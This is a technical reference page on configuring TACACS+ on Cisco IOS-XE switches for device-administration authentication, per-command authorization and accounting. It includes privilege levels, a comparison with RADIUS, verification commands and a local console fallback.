TACACS+

TACACS+ server configuration for device administration, command authorization, and accounting.

TACACS+ Server Definition

Define a TACACS+ server β€” IOS-XE syntax
Switch(config)# tacacs server tac-01
Switch(config-server-tacacs)# address ipv4 10.50.1.30
Switch(config-server-tacacs)# key 0 <SHARED-SECRET>
Switch(config-server-tacacs)# timeout 5
TACACS+ uses TCP port 49, not UDP. This gives you reliable delivery and the ability to detect server failure faster than RADIUS (which uses UDP and relies on timeouts).

Server Groups

Group TACACS+ servers for redundancy
Switch(config)# aaa group server tacacs+ TAC-SERVERS
Switch(config-sg-tacacs+)# server name tac-01
Switch(config-sg-tacacs+)# server name tac-02

AAA Configuration for TACACS+

Authentication β€” TACACS+ with local fallback for device admin
Switch(config)# aaa authentication login default group TAC-SERVERS local
Switch(config)# aaa authentication enable default group TAC-SERVERS enable
Exec authorization β€” control shell access and privilege level assignment
Switch(config)# aaa authorization exec default group TAC-SERVERS local
Command authorization β€” every command checked against TACACS+ server
Switch(config)# aaa authorization commands 1 default group TAC-SERVERS local
Switch(config)# aaa authorization commands 15 default group TAC-SERVERS local

This is the power of TACACS+ over RADIUS for device administration: per-command authorization. The server decides whether show running-config is permitted for a given user. RADIUS cannot do this — it only assigns a privilege level at login.

Command accounting β€” log every command to the TACACS+ server
Switch(config)# aaa accounting exec default start-stop group TAC-SERVERS
Switch(config)# aaa accounting commands 1 default start-stop group TAC-SERVERS
Switch(config)# aaa accounting commands 15 default start-stop group TAC-SERVERS

Privilege Levels

Custom privilege level β€” give help desk read-only access
Switch(config)# privilege exec level 7 show running-config
Switch(config)# privilege exec level 7 show interfaces
Switch(config)# privilege exec level 7 show ip route
Switch(config)# username helpdesk privilege 7 algorithm-type scrypt secret <PASSWORD>

Levels 0-15. Level 1 is user EXEC. Level 15 is full privileged EXEC. Custom levels (2-14) let you expose specific commands without full admin. TACACS+ can also assign privilege level dynamically via the priv-lvl attribute in the shell profile.

TACACS+ vs RADIUS

Feature TACACS+ RADIUS

Transport

TCP 49

UDP 1812/1813

Encryption

Full packet body

Password field only

Authorization granularity

Per-command

Per-session (privilege level)

Primary use case

Device administration

Network access (802.1X, VPN)

Accounting detail

Command-level

Session-level

Multiprotocol

No (IP only)

Yes (PPP, 802.1X, etc.)

Rule of thumb: TACACS+ for managing the device (who can run which commands). RADIUS for managing who gets on the network (802.1X, MAB, VPN).

Source Interface

Force TACACS+ packets from a consistent source
Switch(config)# ip tacacs source-interface Loopback0

Verification

Show TACACS+ server status and statistics
Switch# show tacacs
Switch# show aaa servers
Test TACACS+ authentication
Switch# test aaa group TAC-SERVERS admin <PASSWORD> new-code
Debug TACACS+ β€” watch the authentication/authorization exchange
Switch# debug tacacs authentication
Switch# debug tacacs authorization
Switch# debug tacacs accounting

Expected debug output shows the TCP connection to port 49, the authentication START packet, and the server PASS/FAIL response. If you see TCP connection refused — the TACACS+ daemon is down or a firewall is blocking port 49.

Console Escape Hatch

Always keep console on local auth β€” never lock yourself out
Switch(config)# aaa authentication login CONSOLE local
Switch(config)# line con 0
Switch(config-line)# login authentication CONSOLE

If the TACACS+ server goes down and you used default on the console line without local fallback, you need password recovery. The console escape hatch prevents that.